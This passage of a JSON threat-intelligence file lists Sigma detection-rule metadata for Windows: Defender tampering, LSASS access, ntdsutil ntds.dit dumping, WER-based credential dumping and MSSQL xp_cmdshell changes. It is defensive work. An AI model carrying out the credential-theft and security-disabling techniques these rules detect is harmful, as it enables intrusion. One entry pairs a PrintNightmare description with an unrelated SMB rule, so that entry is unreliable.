] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "value": "Unsigned Binary Loaded From Suspicious Location" }, { "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to 
sideload arbitrary DLL", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-08-02", "falsepositive": [ "Unknown" ], "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "value": "Microsoft Defender Blocked from Loading Unsigned DLL" }, { "description": "Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-13", "falsepositive": [ "Legitimate application requesting certificate exports will trigger this. 
Apply additional filters as needed" ], "filename": "win_certificateservicesclient_lifecycle_system_cert_exported.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml" ], "tags": [ "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58c0bff0-40a0-46e8-b5e8-b734b84d2017", "value": "Certificate Exported From Local Certificate Store" }, { "description": "Detects an attempted PrintNightmare (CVE-2021-1675) remote code execution in the Windows Spooler Service", "meta": { "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "creation_date": "2021-06-30", "falsepositive": [ "Account fallback reasons (after failed login with specific account)" ], "filename": "win_smbclient_security_susp_failed_guest_logon.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare", "https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/", "https://twitter.com/KevTheHermit/status/1410203844064301056", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml" ], "tags": [ "attack.credential-access", "attack.t1110.001" ] }, "related": [ { "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"71886b70-d7b4-4dbf-acce-87d2ca135262", "value": "Suspicious Rejected SMB Guest Logon From IP" }, { "description": "Detects actions taken by Windows Defender malware detection engines", "meta": { "author": "Ján Trenčanský", "creation_date": "2020-07-28", "falsepositive": [ "Unlikely" ], "filename": "win_defender_threat.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", "value": "Windows Defender Threat Detected" }, { "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", "meta": { "author": "Bhabesh Raj, Nasreddine Bencherchali", "creation_date": "2021-07-05", "falsepositive": [ "Administrator might try to disable defender features during testing (must be investigated)" ], "filename": "win_defender_tamper_protection_trigger.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", "value": "Microsoft Defender Tamper Protection Trigger" }, { "description": "Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a \"medium\" level if this occurs too many times in your environment\n", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Administrator actions (should be investigated)", "Seen being triggered occasionally during Windows 8 Defender Updates" ], "filename": "win_defender_real_time_protection_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b28e58e4-2a72-4fae-bdee-0fbe904db642", "value": "Windows Defender Real-time Protection Disabled" }, { "description": "Detects blocking of process creations originating from PSExec and WMI commands", "meta": { "author": "Bhabesh Raj", "creation_date": "2020-07-14", "falsepositive": [ "Unknown" ], "filename": "win_defender_asr_psexec_wmi.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://twitter.com/duff22b/status/1280166329660497920", "https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1047", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "value": "PSExec and WMI Process Creations Block" }, { "description": "Detects when someone is adding or removing applications or folders from exploit guard \"ProtectedFolders\" or \"AllowedApplications\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Unlikely" ], "filename": "win_defender_config_change_exploit_guard_tamper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "value": "Windows Defender Exploit Guard Tamper" }, { "description": "Detects Access to LSASS Process", "meta": 
{ "author": "Markus Neis", "creation_date": "2018-08-26", "falsepositive": [ "Google Chrome GoogleUpdate.exe", "Some Taskmgr.exe related activity" ], "filename": "win_defender_asr_lsass_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "value": "LSASS Access Detected via Attack Surface Reduction" }, { "description": "Detects disabling of the Windows Defender virus scanning feature", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Unknown" ], "filename": "win_defender_virus_scan_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "686c0b4b-9dd3-4847-9077-d6c1bbe36fcb", "value": "Windows Defender Virus Scanning 
Feature Disabled" }, { "description": "Windows Defender logs when the history of detected infections is deleted.", "meta": { "author": "Cian Heasley", "creation_date": "2020-08-13", "falsepositive": [ "Deletion of Defender malware detections history for legitimate reasons" ], "filename": "win_defender_history_delete.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", "value": "Windows Defender Malware Detection History Deletion" }, { "description": "Detects the Setting of Windows Defender Exclusions", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-07-06", "falsepositive": [ "Administrator actions" ], "filename": "win_defender_config_change_exclusion_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/_nullbind/status/1204923340810543109", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", "value": "Windows Defender Exclusions Added" }, { "description": "Detects disabling of the Windows Defender feature of scanning for malware and 
other potentially unwanted software", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Unknown" ], "filename": "win_defender_malware_and_pua_scan_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bc275be9-0bec-4d77-8c8f-281a2df6710f", "value": "Windows Defender Malware And PUA Scanning Disabled" }, { "description": "Detects the restoration of files from the defender quarantine", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-06", "falsepositive": [ "Legitimate administrator activity restoring a file" ], "filename": "win_defender_restored_quarantine_file.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "value": "Win Defender Restored Quarantine File" }, { "description": "Detects triggering of AMSI by Windows Defender.", "meta": { "author": "Bhabesh Raj", "creation_date": "2020-09-14", "falsepositive": [ "Unlikely" ], "filename": "win_defender_malware_detected_amsi_source.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", "value": "Windows Defender AMSI Trigger Detected" }, { "description": "Detects the expiration of the grace period of Windows Defender. 
This means protection against viruses, spyware, and other potentially unwanted software is disabled.\n", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Unknown" ], "filename": "win_defender_antimalware_platform_expired.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "360a1340-398a-46b6-8d06-99b905dc69d2", "value": "Windows Defender Grace Period Expired" }, { "description": "Detects issues with Windows Defender Real-Time Protection features", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)", "creation_date": "2023-03-28", "falsepositive": [ "Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. 
Manual exception is required" ], "filename": "win_defender_real_time_protection_errors.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346", "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd80db93-6ec2-4f4c-a017-ad40da6ffe81", "value": "Windows Defender Real-Time Protection Failure/Restart" }, { "description": "Detects suspicious changes to the Windows Defender configuration", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-06", "falsepositive": [ "Administrator activity (must be investigated)" ], "filename": "win_defender_suspicious_features_tampering.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "801bd44f-ceed-4eb6-887c-11544633c0aa", "value": "Windows Defender Configuration Changes" }, 
{ "description": "Detects disabling of the \"Automatic Sample Submission\" feature of Windows Defender.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-06", "falsepositive": [ "Administrator activity (must be investigated)" ], "filename": "win_defender_config_change_sample_submission_consent.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91903aba-1088-42ee-b680-d6d94fe002b0", "value": "Windows Defender Submit Sample Feature Disabled" }, { "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", "meta": { "author": "frack113", "creation_date": "2023-01-12", "falsepositive": [ "Unknown" ], "filename": "win_software_restriction_policies_block.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies", "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml" ], "tags": [ "attack.defense-evasion", "attack.t1072" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "value": "Restricted Software Access By SRP" }, { "description": "Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2017-02-19", "falsepositive": [ "Some software piracy tools (key generators, cracks) are classified as hack tools" ], "filename": "win_av_relevant_match.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml" ], "tags": [ "attack.resource-development", "attack.t1588" ] }, "related": [ { "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", "value": "Relevant Anti-Virus Signature Keywords In Application Log" }, { "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "meta": { "author": "Florian Roth (Nextron Systems)", 
"creation_date": "2017-05-09", "falsepositive": [ "MsMpEng might crash if the \"C:\\\" partition is full" ], "filename": "win_application_msmpeng_crash_error.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_application_msmpeng_crash_error.yml" ], "tags": [ "attack.defense-evasion", "attack.t1211", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "545a5da6-f103-4919-a519-e9aec1026ee4", "value": "Microsoft Malware Protection Engine Crash" }, { "description": "Detects Windows error reporting event where the process that crashed is lsass. 
This could be the result of an intentional crash caused by techniques such as Lsass-Shtinkering to dump credentials", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-07", "falsepositive": [ "Rare legitimate crashing of the lsass process" ], "filename": "win_werfault_susp_lsass_credential_dump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a18e0862-127b-43ca-be12-1a542c75c7c5", "value": "Potential Credential Dumping Via WER - Application" }, { "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-09", "falsepositive": [ "MsMpEng might crash if the \"C:\\\" partition is full" ], "filename": "win_application_msmpeng_crash_wer.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml" ], "tags": [ 
"attack.defense-evasion", "attack.t1211", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c82cf5c-090d-4d57-9188-533577631108", "value": "Microsoft Malware Protection Engine Crash - WER" }, { "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate backup operation/creating shadow copies" ], "filename": "win_esent_ntdsutil_abuse.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/mgreen27/status/1558223256704122882", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "value": "Ntdsutil Abuse" }, { "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate backup operation/creating shadow copies" ], "filename": "win_esent_ntdsutil_abuse_susp_location.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://twitter.com/mgreen27/status/1558223256704122882", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", "value": "Dump Ntds.dit To Suspicious Location" }, { "description": "Detects events generated by user-mode applications when they call the CveEventWrite API because an attempt is being made to exploit a known vulnerability.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability).\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", "meta": { "author": "Florian Roth (Nextron Systems), Zach Mathis", "creation_date": "2020-01-15", "falsepositive": [ "Unknown" ], "filename": "win_audit_cve.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/DidierStevens/status/1217533958096924676", "https://twitter.com/VM_vivisector/status/1217190929330655232", "https://www.youtube.com/watch?v=ebmW42YYveI", "https://nullsec.us/windows-event-log-audit-cve/", "https://twitter.com/FlemmingRiis/status/1217147415482060800", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml" ], "tags": [ "attack.execution", "attack.t1203", "attack.privilege-escalation", "attack.t1068", "attack.defense-evasion", "attack.t1211", "attack.credential-access", "attack.t1212", "attack.lateral-movement", "attack.t1210", "attack.impact", "attack.t1499.004" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "value": "Audit CVE Event" }, { "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Legitimate enable/disable of the setting", "Note that since the event contains the change for both values, this rule will trigger on both enable and disable" ], "filename": "win_mssql_xp_cmdshell_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml" ], "tags": [ "attack.execution" ] }, "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", "value": "MSSQL XPCmdshell Option Change" }, { "description": "Detects when a stored procedure is set or cleared for automatic execution in MSSQL. 
